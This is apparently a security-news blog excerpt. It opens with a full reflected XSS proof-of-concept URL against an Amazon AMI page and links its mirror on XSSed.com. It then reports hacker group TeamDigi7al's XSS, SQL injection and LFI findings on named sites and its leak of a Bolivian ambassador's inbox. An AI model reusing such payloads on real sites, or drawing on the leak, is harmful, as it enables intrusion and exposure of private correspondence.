https://aws.amazon.com/amis?ami_provider_id=4&architecture='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x015E00)%3C/script%3E&selection=ami_provider_id%2Barchitecture

It seems that the vulnerability has been fixed by the vendor: the admin now filters HTML by converting it to HTML special characters. Anyway, we are able to retrieve a mirror of the vulnerability from XSSed.com.

Mirror is available here:
http://www.xssed.com/mirror/77551/

Screenshot of the vulnerability

TeamDigi7al found vulnerabilities in NASA, vatican.va and weather.com


The hacker group TeamHav0k reformed and made a new group called "TeamDigi7al". The hacker group has now become active and exposed vulnerabilities in some high-profile sites.

The hackers exposed XSS vulnerabilities in NASA (careerlaunch.jpl.nasa.gov), Vatican.va and weather.com. They found a SQL injection vulnerability in the LoC (webarchive.loc.gov) and an LFI vulnerability in Humboldt State University (humboldt.edu).

The hackers also hacked and dumped the Bolivian ambassador's inbox. They uploaded a 62MB RAR file (Emails.rar) to uppit.com.